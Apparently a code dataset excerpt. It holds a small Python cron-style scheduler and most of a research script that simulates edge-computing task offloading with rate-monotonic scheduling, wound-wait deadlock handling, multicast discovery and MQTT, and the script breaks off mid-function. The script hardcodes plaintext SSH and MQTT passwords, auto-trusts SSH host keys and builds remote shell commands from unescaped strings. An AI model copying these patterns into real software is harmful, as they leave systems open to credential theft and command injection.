source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
mycron.py
|
"""
Custom Cron (scheduler)
"""
import datetime
import time
import threading
class MyCron(object):
    """
    Custom cron (scheduler) class.

    Checks the task list every <base_delay> seconds (can be float) and runs
    each task when its counter reaches <freq> checks.

    Usage:
        cron = MyCron(60)                     # check once a minute
        cron.add_task("taskone", 5, testfun)  # call testfun() every 5 minutes
        cron.remove_task("taskone")           # remove task (no longer executed)
        cron.start()

    Inspiration:
        http://stackoverflow.com/questions/373335/suggestions-for-a-cron-like-scheduler-in-python/374207#374207
    """
    def __init__(self, base_delay=60.0):
        # Seconds between scans of the task list.
        self._base_delay = base_delay
        # name -> {"freq", "counter", "task", "args", "kwargs"}
        self._tasks = {}
        self._last_check = datetime.datetime.now()
        # Daemon thread so a running scheduler never blocks interpreter exit.
        self._checker_thread = threading.Thread(target=self._checker)
        self._checker_thread.daemon = True

    def add_task(self, name, freq, task, *args, **kwargs):
        """Add (or replace) a task: call task(*args, **kwargs) every `freq` checks."""
        self._tasks[name] = {
            "freq": freq,
            "counter": 0,
            "task": task,
            "args": args,
            "kwargs": kwargs,
        }

    def remove_task(self, name):
        """Remove task from tasklist by name (no-op if absent)."""
        if name in self._tasks:
            del self._tasks[name]

    def start(self):
        """Start checker thread."""
        self._checker_thread.start()

    def _checker(self):
        """Main loop of checker thread."""
        while True:
            self._last_check = datetime.datetime.now()
            # Iterate over a snapshot so add_task/remove_task from other
            # threads cannot break iteration mid-loop. (Fix: .iteritems()
            # was Python-2-only and iterated the live dict.)
            for name, task in list(self._tasks.items()):
                task["counter"] += 1
                if task["counter"] >= task["freq"]:
                    task["counter"] = 0
                    task["task"](*task["args"], **task["kwargs"])
            now = datetime.datetime.now()
            if now >= self._last_check:
                # Fix: timedelta.microseconds holds only the sub-second
                # component, silently ignoring whole seconds spent running
                # tasks; total_seconds() gives the real elapsed time.
                seconds_since_last_check = (now - self._last_check).total_seconds()
                if seconds_since_last_check < self._base_delay:
                    time.sleep(self._base_delay - seconds_since_last_check)
|
6_rms_wound_wait_NS.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
import getpass as gp
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
hosts = {}  # {hostname: ip} of MEC peers discovered over multicast
# Periodic task set used by the RMS scheduler: worst-case execution time,
# period and deadline (in scheduler time units) per task type.
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
          't2': {'wcet': 1, 'period': 5, 'deadline': 4},
          't3': {'wcet': 2, 'period': 10, 'deadline': 8},
          't4': {'wcet': 1, 'period': 10, 'deadline': 9},
          't5': {'wcet': 3, 'period': 15, 'deadline': 12}
          }
# mat = {'p0': ['cpu', 'mem', 'storage']}
# Remaining resource need per task type: [cpu, mem, storage] instances.
_need = {
    't1': [7, 4, 3],
    't2': [1, 2, 2],
    't3': [6, 0, 0],
    't4': [0, 1, 1],
    't5': [4, 3, 1]
}
# Resources currently allocated per task type: [cpu, mem, storage] instances.
allocation = {
    't1': [0, 1, 0],
    't2': [2, 0, 0],
    't3': [3, 0, 2],
    't4': [2, 1, 1],
    't5': [0, 0, 2]
}
_cpu = []  # cpu plot list (utilisation deltas sampled by m_cpu())
prev_t = 0  # previous cpu sample, used by m_cpu() to compute the delta
_off_mec = 0  # count of tasks offloaded from local mec to another mec
_off_cloud = 0  # count of tasks offloaded to cloud
_loc = 0  # count of tasks executed locally
_inward_mec = 0  # count of tasks offloaded from another mec to local mec
deadlock = [1]  # keeps count of how many deadlocks were resolved
memory = []  # memory-usage samples of this process (see _memory())
mec_waiting_time = {}  # {ip: [moving (waiting time + rtt)]}
mec_rtt = {}  # {ip: [RTT]}
offload_register = {}  # {task: host_ip} tracks tasks sent to a mec for offload
reoffload_list = [[], {}]  # [[task_list], {task: wait_time}] — tasks re-offloaded to this mec to execute
discovering = 0  # if discovering == 0, 'update' messages may replace the host table
test = []
_time = []
_pos = 0
received_task_queue = []  # [[(task_list, wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {}  # {client_id: client_ip} — addresses of tasks offloaded to cloud
cloud_port = 63000
stop = 0  # set non-zero to make the worker loops exit
task_record = {}  # keeps record of tasks re-offloaded ({task_name: 'mec'|'cloud'})
task_id = 0  # monotonically increasing id appended to outgoing task names
shared_resource_lock = threading.Lock()  # guards mutations of reoffload_list
t_track = 1  # local tracking id appended to tasks received for re-offload
def discovering_group():
    """Create the global sock1: a UDP socket bound to port 10000 and joined
    to the peer-discovery multicast group 224.3.29.71."""
    global sock1
    group_ip = '224.3.29.71'
    bind_addr = ('', 10000)
    sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock1.bind(bind_addr)
    # Ask the OS to join the multicast group on all interfaces.
    membership = struct.pack('4sL', socket.inet_aton(group_ip), socket.INADDR_ANY)
    sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
def offloading_group():
    """Create the global sock2: a UDP socket bound to port 20000 and joined
    to the task-offloading multicast group 224.5.5.55."""
    global sock2
    group_ip = '224.5.5.55'
    bind_addr = ('', 20000)
    sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock2.bind(bind_addr)
    # Ask the OS to join the multicast group on all interfaces.
    membership = struct.pack('4sL', socket.inet_aton(group_ip), socket.INADDR_ANY)
    sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
def ip_address():
    """Return this host's IPv4 address as a string.

    First tries the address bound to eth1 (via ifconfig); if that does not
    yield a dotted quad, falls back to the source address chosen for a UDP
    "connection" to a public IP (no packets are actually sent).

    Fixes over the original: the fallback sockets are now closed (they were
    leaked), and the duplicated fallback code is factored into one helper.
    """
    def _default_route_ip():
        # UDP connect() only selects a route/local address; nothing is sent.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
        finally:
            s.close()

    try:
        cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
        address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
        if len(address.strip().split('.')) == 4:
            return address.strip()
        return _default_route_ip()
    except Exception:
        # ifconfig missing / eth1 absent — fall back to the routing trick.
        return _default_route_ip()
def _memory():
    """Append this process's current memory usage (%) to the `memory` series.

    `algo` is the psutil.Process handle created in main().
    """
    global memory
    memory.append(round(algo.memory_percent(), 4))
def m_cpu():
    """Sample system-wide CPU utilisation and record the absolute change
    since the previous sample in the `_cpu` series."""
    global prev_t
    # get cpu
    current = psutil.cpu_percent(percpu=False)
    _cpu.append(round(abs(prev_t - current), 4))
    prev_t = current
def get_mec_rtts():
    """Append a fresh RTT measurement for every known peer MEC."""
    for host, samples in mec_rtt.items():
        samples.append(get_rtt(host))
def generate_results():
    """Take one sample of every tracked metric (memory, cpu delta, peer RTTs)."""
    _memory()
    m_cpu()
    get_mec_rtts()
def host_ip_set():
    """Collect this host's IPv4 addresses (one entry per interface) into the
    global `ip_set`, used later to ignore our own multicast packets."""
    global ip_set
    ip_set = set()
    placeholder = [{'addr': 'No IP addr'}]
    for iface in interfaces():
        entries = ifaddresses(iface).setdefault(AF_INET, placeholder)
        ip_set.add(', '.join(entry['addr'] for entry in entries))
def get_time():
    """Return the current UTC time as a list of strings:
    [year, month, day, hour, minute, second, microseconds]."""
    date_part, clock_part = str(dt.datetime.utcnow()).split()
    stamp = date_part.split('-')
    clock_bits = clock_part.split('.')
    stamp += clock_bits[0].split(':')
    stamp.append(clock_bits[1])
    return stamp
def get_rtt(host):
    """Ping `host` until a measurement succeeds; return it rounded to 4 dp.

    Fix: the original retried via unbounded recursion, which raises
    RecursionError after ~1000 consecutive failed pings on an unreachable
    host. An equivalent retry loop has no such limit.
    """
    while True:
        rtt = pc.verbose_ping(host)
        if rtt:
            return round(rtt, 4)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
    """Pseudo-random integer in [0, _range), derived from a random modular
    power of 23 (ad-hoc distribution, not uniform)."""
    base = 23 ** r.randrange(1, 1331)
    return (base % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
    """MQTT connect callback: subscribe to this node's own topic (node_id)."""
    # print("Connected with Code :" +str(rc))
    # Subscribe Topic from here
    connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
    """MQTT message callback.

    Payload prefixes:
      'c <task>'  -> result returned from the cloud: strip the task_id suffix,
                     publish the result to the client's topic and clear the
                     task from task_record.
      't <data>'  -> new task batch from a client: queue it for the main loop.
    """
    data = str(msg.payload, 'utf-8')
    if data[0] == 'c':  # receive from cloud
        received_task = data[2:]
        # send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
        if received_task in task_record:
            del task_record[received_task]
            # drop the trailing '.task_id' before replying to the client
            received_task = '.'.join(received_task.split('.')[:-1])
            _client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time()+['cloud']}), )
            cooperate['cloud'] += 1
            count_task_sent(received_task)
    elif data[0] == 't':  # receive from client
        received_task = ast.literal_eval(data[2:])
        received_task_queue.append(received_task)
        received_time.append(time.time())
    else:
        print('data: ', data)
def connect_to_broker():
    """Connect to the MQTT broker on the 'speaker' host and block in its
    network loop; run this function in its own thread."""
    global _client
    global broker_ip
    username = 'mec'
    password = 'password'
    broker_ip = hosts['speaker']  # broker runs on the peer registered as 'speaker'
    broker_port_no = 1883
    _client = mqtt.Client()
    _client.on_connect = on_connect
    _client.on_message = on_message
    _client.username_pw_set(username, password)
    _client.connect(broker_ip, broker_port_no, 60)
    _client.loop_forever()  # blocking
def task_time_map(seq, process):
    """Expand a schedule order into unit execution slots.

    Repeatedly sweeps `seq`, emitting each job once per sweep while it still
    has remaining wcet budget in `process`, until every job's budget is
    exhausted. Mutates process[job]['wcet'] down to zero.
    """
    expanded = []
    remaining = sum(entry['wcet'] for entry in process.values())
    while remaining > 0:
        for job in seq:
            if process[job]['wcet'] > 0:
                expanded.append(job)
                process[job]['wcet'] -= 1
                remaining -= 1
    return expanded
def load_tasks():
    """Return (hyperperiod, task set including an 'idle' filler task).

    The hyperperiod is the LCM of all task periods. The idle task has
    wcet == hyperperiod and period hyperperiod + 1, giving it the lowest
    RMS priority so it fills otherwise-unused slots.
    """
    period_list = [tasks[i]['period'] for i in tasks]
    lcm_period = lcm(period_list)
    # insert idle task (no 'deadline' key — the scheduler only reads 'period'/'wcet')
    s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
    return lcm_period, s_task
total_received_task = 0  # running total of unit execution slots scheduled

def scheduler(_lcm_, s_tasks):  # RMS algorithm
    """Simulate rate-monotonic scheduling of `s_tasks` over one hyperperiod.

    Steps one time unit at a time so preemption can be modelled; at each
    tick the queued task with the earliest deadline runs. Returns the flat
    per-unit execution sequence (idle slots removed), expanded through
    task_time_map(). Aborts the whole process (exit(1)) on a deadline miss.
    """
    global total_received_task
    queue = list(s_tasks.keys())  # initialize task queue
    schedule = []
    rms = []
    curr = ''  # current task
    prev = ''  # previous task
    tmp = {}
    for task in s_tasks.keys():
        tmp[task] = {}  # temporary data for each task
        tmp[task]['deadline'] = s_tasks[task]['period']
        tmp[task]['executed'] = 0
    # start scheduling...
    # proceed by one timestamp to handle preemption
    for _time_ in range(_lcm_):
        # insert new job releases into the queue
        for t in tmp.keys():
            if _time_ == tmp[t]['deadline']:
                if s_tasks[t]['wcet'] > tmp[t]['executed']:
                    # print('Scheduling Failed at %d' % time)
                    exit(1)  # deadline miss: task set is unschedulable
                else:
                    tmp[t]['deadline'] += s_tasks[t]['period']
                    tmp[t]['executed'] = 0
                    queue.append(t)
        # select next task to be scheduled: earliest deadline in the queue
        _min_ = _lcm_ * 2
        for task in queue:
            if tmp[task]['deadline'] < _min_:
                _min_ = tmp[task]['deadline']
                curr = task
        tmp[curr]['executed'] += 1
        # print(time, queue, curr)
        # dequeue the execution-completed task
        if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
            for i in range(len(queue)):
                if curr == queue[i]:
                    del queue[i]
                    break
        # record to the schedule trace
        if prev != curr:
            if prev in queue and prev != 'idle':  # previous task is preempted..
                s = schedule.pop()
                schedule.append([s[0], s[1], '*'])  # '*' marks preemption
                rms.append(s[1])
            schedule.append([_time_, curr])
            if curr != 'idle':
                rms.append(curr)
        prev = curr
    # expand the (possibly preempted) order into per-unit slots
    process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
    rms = task_time_map(seq=rms, process=process)
    total_received_task += len(rms)
    return rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
    """Wound-Wait-style deadlock resolution over `processes`.

    Greedily admits processes whose need fits the available resources and
    reclaims their allocation. When a process does not fit, either the
    unfinished process holding the most resources ("wounding" it) or the
    blocked process itself is marked for offload and its allocation freed.
    Offloaded tasks are handed to cooperative_mec(). Returns the local
    execution sequence.
    """
    global deadlock
    offload = []
    # To store execution sequence
    exec_seq = []
    # Make a copy of available resources
    work = [0] * len(processes)  # 0 = pending, 1 = executed or offloaded
    # While all processes are not finished
    # or system is not in safe state.
    while 0 in work:
        ind = work.index(0)
        i = processes[ind]
        # print('comparing| process: ', i, n_need[i], 'work: ', avail)
        if not (False in list(np.greater_equal(avail, n_need[i]))):
            # need fits: execute locally and release its allocation
            exec_seq.append(i)
            avail = np.add(avail, allocat[i])
            work[ind] = 1
        else:
            # among unresolved processes, find the one holding the most resources
            a = list(set(processes) - set(exec_seq) - set(offload))
            n = {}
            for j in a:
                n[j] = sum(allocat[j])
            _max = max(n, key=n.get)
            # print('work: ', work, 'need: ', _need[_max])
            if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
                # wounding _max frees enough for i: offload _max instead
                offload.append(_max)
                avail = np.array(avail) + np.array(allocat[_max])
                work[processes.index(_max)] = 1
            else:
                # otherwise offload the blocked process itself
                offload.append(i)
                avail = np.array(avail) + np.array(allocat[i])
                work[processes.index(i)] = 1
    if len(offload) > 0:
        print('offloading tasks: ', offload)
        cooperative_mec(offload)
        deadlock[0] += 1
    print('Execution seq: ', exec_seq)
    return exec_seq
def get_exec_seq(pro):
    """Build the deadlock-safe execution sequence for the task list `pro`.

    Each entry is tagged with its queue position ('t1_0', 't2_1', ...) so
    duplicate instances of the same task type stay distinct. Need and
    allocation are looked up by the two-character task-type prefix.

    (Removed the unused local `p = len(pro)` from the original.)
    """
    processes = ['{}_{}'.format(task, idx) for idx, task in enumerate(pro)]
    # Available instances of each resource type (cpu, mem, storage).
    avail = [6, 5, 5]
    n_need = {i: _need[i[:2]] for i in processes}
    # print('need', n_need)
    # Resources allocated to processes
    allot = {i: allocation[i[:2]] for i in processes}
    # return execution sequence
    return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
    """Return {task_instance: cumulative waiting time} for an execution sequence.

    Each entry is the sum of the execution times (t_time[task][0]) of all
    earlier tasks plus its own. Also broadcasts half of the final total as
    this MEC's advertised waiting time. Caller guarantees list_seq is
    non-empty (see start_loop).
    """
    pre = 0
    time_dic = {}
    for i in list_seq:
        j = i.split('_')[0]  # strip the '_<index>' instance suffix
        time_dic[i] = round(t_time[j][0] + pre, 3)
        pre += t_time[j][0]
    # waiting time = total waiting time / 2; the full total might be too tight
    w_send = round(time_dic[list(time_dic.keys())[-1]]/2, 3)
    send_message('wt {} {}'.format(ip_address(), str(w_send)))  # Broadcasting waiting time to cooperative MECs
    return time_dic
def compare_local_mec(list_seq):
    """Split scheduled tasks into (run-on-MEC, run-locally) lists.

    A task runs locally when its latency bound t_time[task][1] exceeds its
    projected local waiting time from `list_seq`; otherwise it is a
    candidate for offloading.
    """
    time_compare_dict = {task: t_time[task.split('_')[0]][1] > wait
                         for task, wait in list_seq.items()}
    print('local vs MEC comparison: ', time_compare_dict)
    execute_locally = [t for t, run_local in time_compare_dict.items() if run_local]
    execute_mec = [t for t, run_local in time_compare_dict.items() if not run_local]
    return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
    """Fold sample `a1` into the cumulative moving average for MEC `ma1`.

    Uses the cumulative-average recurrence mu_n = ((n-1)*mu_{n-1} + x_n) / n,
    seeding from the last stored value in mec_waiting_time (0 if unknown).
    Returns the new average rounded to 4 dp; does not mutate the history.
    """
    if ma1 in mec_waiting_time:
        samples = len(mec_waiting_time[ma1])
        last_avg = mec_waiting_time[ma1][-1]
    else:
        samples = 0
        last_avg = 0
    samples += 1
    return round(((samples - 1) * last_avg + a1) / samples, 4)
def send_message(mg):
    """Multicast `mg` to the discovery group (best-effort).

    A plain 'hello' is expanded to "hello [hostname, ip]" so peers can
    register this node.
    """
    _multicast_group = ('224.3.29.71', 10000)
    try:
        # Send data to the multicast group
        if mg == 'hello':
            smg = mg + ' ' + str([get_hostname(), ip_address()])
            sock1.sendto(str.encode(smg), _multicast_group)
            print('\nHello message sent')
        else:
            sock1.sendto(str.encode(mg), _multicast_group)
    except Exception as e:
        print(e)
def get_hostname():
    """Return this machine's hostname as recorded in /etc/hostname
    (trailing newline stripped)."""
    raw = sp.check_output(['cat /etc/hostname'], shell=True)
    return str(raw, 'utf-8')[0:-1]
def receive_message():  # used for multi-cast message exchange among MEC
    """Receive-loop for the discovery multicast socket (run as a thread).

    Message kinds:
      'hello [host, ip]'    -> register a peer MEC and start an RTT series
      'update {hosts}'      -> replace the whole host table (only while discovering == 0)
      'wt <ip> <seconds>'   -> record a peer's advertised waiting time + our RTT to it
    Exits when the global `stop` flag is set.
    """
    global hosts
    while True:
        if stop == 1:
            print('Stopped: receive_message()')
            break
        else:
            data, address = sock1.recvfrom(1024)
            _d = data.decode()
            if _d[:5] == 'hello':
                _data = ast.literal_eval(_d[6:])
                hosts[_data[0]] = _data[1]
                if _data[1] != host_ip:
                    mec_rtt[_data[1]] = []
            elif (_d[:6] == 'update') and (discovering == 0):
                hosts = ast.literal_eval(_d[7:])
                # print('received: ', hosts)
                # NOTE(review): this iterates hostname keys but compares them to
                # host_ip (an IP) and keys mec_rtt by hostname, unlike the
                # 'hello' branch which keys by IP — confirm which is intended.
                for i in hosts:
                    if i != host_ip:
                        mec_rtt[i] = []
            elif _d[:2] == 'wt':
                split_data = _d.split()
                if split_data[1] != host_ip:
                    # moving average of the peer's wait time plus our RTT to it
                    w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
                    if split_data[1] in mec_waiting_time:
                        mec_waiting_time[split_data[1]].append(w_time)
                    else:
                        mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
    """Return the key of the MEC with the smallest latest waiting-time sample,
    or 0 when no peer waiting times are known yet."""
    if not mec_waiting_time:
        return 0
    latest = {peer: samples[-1] for peer, samples in mec_waiting_time.items()}
    return min(latest, key=latest.get)
def cooperative_mec(mec_list):
    """Dispatch offloaded task instances to the best peer MEC or to the cloud.

    For each instance: if no peer waiting times are known, publish to the
    cloud topic. Otherwise pick the least-loaded peer; send the task there
    when its resource need fits a full MEC capacity AND either the peer's
    wait beats the task's latency bound or the peer's RTT beats the cloud's
    RTT. In every other case, fall back to the cloud. Every dispatched task
    gets a unique '.task_id' suffix and is tracked in task_record.
    """
    global _off_cloud
    global _off_mec
    global task_id, task_record
    for i in mec_list:
        _host = mec_comparison()
        if _host == 0:
            # no known peers: send straight to the cloud broker topic
            # send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]])  # [task_id,exec_time]
            _send_task = f"{i.split('_')[0]}.{task_id}"
            _client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
            task_record[_send_task] = 'cloud'
            task_id += 1
            _off_cloud += 1
            # cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
            print('\n=========SENDING {} TO CLOUD==========='.format(i))
        else:
            j = i.split('_')[0]
            _max = np.array([6, 5, 5])  # full resource capacity of one MEC
            send = 'false'
            if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
                send = 'true'  # the task can fit on a peer MEC at all
            # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
            if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
                _send_task = f"{j}.{task_id}"
                send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
                task_record[_send_task] = 'mec'
                task_id += 1
                _off_mec += 1
                # SENDS TASK TO MEC FOR EXECUTION
                w_send = mec_waiting_time[_host][-1] + 0.001
                mec_waiting_time[_host].append(w_send)  # adds a new average waiting time
                print('\n======SENDING {} TO MEC {}========='.format(i, _host))
            elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
                _send_task = f"{j}.{task_id}"
                send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
                task_record[_send_task] = 'mec'
                task_id += 1
                _off_mec += 1
                # SENDS TASK TO MEC FOR EXECUTION
                w_send = mec_waiting_time[_host][-1] + 0.001
                mec_waiting_time[_host].append(w_send)  # adds a new average waiting time
                print('\n======SENDING {} TO MEC {}========='.format(i, _host))
            else:
                _send_task = f"{j}.{task_id}"
                _client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
                task_record[_send_task] = 'cloud'
                task_id += 1
                _off_cloud += 1
                # send_cloud([j, t_time[j][0]])  # [task_id,exec_time]
                # cloud_register[j.split('.')[2]] = send_back_host
                print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0  # count of re-offloaded tasks executed here and returned to their origin MEC
offload_check = [0, 0]  # stats: [single-task fast-path count, batch-path count]

def execute_re_offloaded_task(offloaded_task):
    """Execute a batch of tasks that peer MECs re-offloaded to this node.

    offloaded_task = [task_list, {task: exec_time}]. Runs the batch through
    the deadlock-safe sequencer, sleeps half of each task's recorded time to
    simulate execution, then multicasts each result back to the MEC named in
    the task id (second dot-field).
    """
    global outward_mec, offload_check
    exec_list = get_exec_seq(offloaded_task[0])
    outward_mec += len(exec_list)
    for i in offloaded_task[0]:  # i = 't1.1.2.3*1_3'
        j = i.split('_')[0]  # drop the instance suffix
        time.sleep(offloaded_task[1][j] / 2)  # simulated execution time
        # '<origin mec id> <task without the *track suffix>'
        send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}  # {client_id: number of completed tasks returned to it}

def count_task_sent(task):
    """Tally one completed task against its client id (third dot-field of
    the task name)."""
    global clients_record
    client = task.split('.')[2]
    clients_record[client] = clients_record.get(client, 0) + 1
def execute(local):
    """Execute the tasks assigned to run locally.

    Execution is simulated by sleeping half of each task's recorded time;
    each result is then published to its client's topic tagged 'local'.
    """
    print('\nExecuting :', local)
    for i in local:
        j = i.split('_')[0]  # drop the instance suffix
        _t = t_time[j][0] / 2
        time.sleep(_t)  # simulated execution time
        print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
        _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
        count_task_sent(j)
    print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}  # counts of results returned via peer MEC vs cloud

def receive_offloaded_task_mec():  # run as a thread
    """Receive-loop for the offloading multicast socket.

    Ignoring our own multicasts (source address in ip_set), handles:
      '<node_id> <task>'          -> a peer finished a task we offloaded:
                                     publish the result back to the client.
      'ex <node_id> [task, t]'    -> a peer asks us to execute a task:
                                     tag it with a local track id and enqueue.
    Exits when the global `stop` flag is set.
    """
    global _inward_mec
    global t_track
    while True:
        if stop == 1:
            print('Stopped: receive_offloaded_task_mec()')
            break
        else:
            data, address = sock2.recvfrom(1024)
            if len(data.decode()) > 0:
                da = data.decode().split(' ')
                if (address[0] not in ip_set) and (da[0] == node_id):  # send back to client
                    # send_client({da[1]: get_time()}, offload_register[da[1]])  # send back to client
                    if da[1] in task_record:
                        del task_record[da[1]]
                        task_new = '.'.join(da[1].split('.')[:-1])  # strip the task_id suffix
                        _client.publish(da[1].split('.')[2], str({task_new: get_time()+['mec']}), )
                        count_task_sent(da[1])
                        cooperate['mec'] += 1
                    else:
                        print('*'*30 + f'\n{da[1]} Not in Task Record\n' + '*'*30)
                elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
                    # payload list contained a space, so it arrived split in two
                    _received = ast.literal_eval(da[2] + da[3])
                    shared_resource_lock.acquire()
                    task = _received[0] + '*{}'.format(t_track)  # tag with local track id
                    reoffload_list[0].append(task)
                    reoffload_list[1][task] = _received[1]
                    shared_resource_lock.release()
                    t_track += 1
                    _inward_mec += 1
def call_execute_re_offload():
    """Worker loop executing tasks other MECs re-offloaded to us (run as a thread).

    Exactly one queued task: fast path — sleep half its recorded time and
    multicast the result back. More than one: hand the whole batch to
    execute_re_offloaded_task(). Exits when `stop` is set.
    """
    global reoffload_list, outward_mec
    global offload_check
    while True:
        if stop == 1:
            print('Stopped: call_execute_re_offload()')
            break
        else:
            if len(reoffload_list[0]) == 1:
                t = reoffload_list[0][-1]
                time.sleep(reoffload_list[1][t] / 2)  # simulated execution
                shared_resource_lock.acquire()
                reoffload_list[0].remove(t)
                del reoffload_list[1][t]
                shared_resource_lock.release()
                send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
                outward_mec += 1
                offload_check[0] += 1
            elif len(reoffload_list[0]) > 1:
                # NOTE(review): .copy() is shallow — o[0]/o[1] still alias the
                # live queue, so the receiver thread can append mid-batch;
                # confirm this is acceptable.
                o = reoffload_list.copy()
                # NOTE(review): len(o) is always 2 (the [list, dict] pair);
                # len(o[0]) — the batch size — was probably intended here.
                offload_check[1] += len(o)
                execute_re_offloaded_task(o)
                for i in o[0]:
                    shared_resource_lock.acquire()
                    reoffload_list[0].remove(i)
                    del reoffload_list[1][i]
                    shared_resource_lock.release()
def send_email(msg):
    """Email `msg` (the experiment results) via Gmail SMTP, using credentials
    from the project `config` module. Best-effort: failures are printed."""
    try:
        server = smtplib.SMTP_SSL('smtp.gmail.com')
        server.ehlo()
        server.login(config.email_address, config.password)
        subject = 'Deadlock results rms+wound_wait {}'.format(get_hostname())
        # msg = 'Attendance done for {}'.format(_timer)
        _message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
        server.sendmail(config.email_address, config.send_email, _message)
        server.quit()
        print("Email sent!")
    except Exception as e:
        print(e)
def send_offloaded_task_mec(msg):
    """Broadcast `msg` on the MEC offloading multicast group (best-effort)."""
    group_addr = ('224.5.5.55', 20000)
    try:
        sock2.sendto(str.encode(msg), group_addr)
    except Exception as e:
        print(e)
def mec_id(client_ip):
    """Return the last octet of `client_ip` zero-padded to three digits,
    used as this node's MQTT/multicast identifier."""
    return client_ip.split('.')[-1].zfill(3)
def run_me():
    """Program flow: initialise, wait until all `mec_no` peers are discovered,
    then enter the main scheduling loop."""
    global discovering
    global hosts
    initialization()
    while True:
        if len(hosts) == mec_no:
            print('MEC Details: ', hosts)
            del hosts[get_hostname()]  # drop ourselves from the peer table
            discovering = 1  # freeze the host table against 'update' messages
            break
        time.sleep(2)
    start_loop()
def send_result(host_, data):
    """Append each line of `data` to /home/mec/result/data.py on `host_` over
    SSH (best-effort; failures are printed).

    NOTE(review): each line is interpolated into a remote shell `echo`
    unescaped — acceptable for our own generated result strings, but unsafe
    for arbitrary input.
    """
    try:
        c = paramiko.SSHClient()
        un = 'mec'
        pw = 'password'
        port = 22
        c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        c.connect(host_, port, un, pw)
        for i in data:
            cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i))  # task share : host ip task
            stdin, stdout, stderr = c.exec_command(cmd)
    except Exception as e:
        print(e)
def save_and_abort():
    """Persist all experiment counters, ship them to the result host, notify
    clients of unanswered tasks, then hard-kill this process.

    Results are written both locally (data/raw/ as *.py assignment lines)
    and remotely via scp/SSH to the 'osboxes-0' host, plus one summary email.
    """
    global stop
    _id_ = get_hostname()[-1]  # numeric suffix of this MEC's hostname
    # Summary string for the email; the same data as separate lines below.
    result = f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} " \
             f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
             f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
             f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
             f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
             f"\nloc{_id_}_7_{mec_no} = {_loc} " \
             f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
             f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
             f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record}" \
             f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}" \
             f"\noffload_check{_id_}_7_{mec_no} = {offload_check}"
    list_result = [
        f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} ",
        f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
        f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
        f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
        f"\nloc{_id_}_7_{mec_no} = {_loc} ",
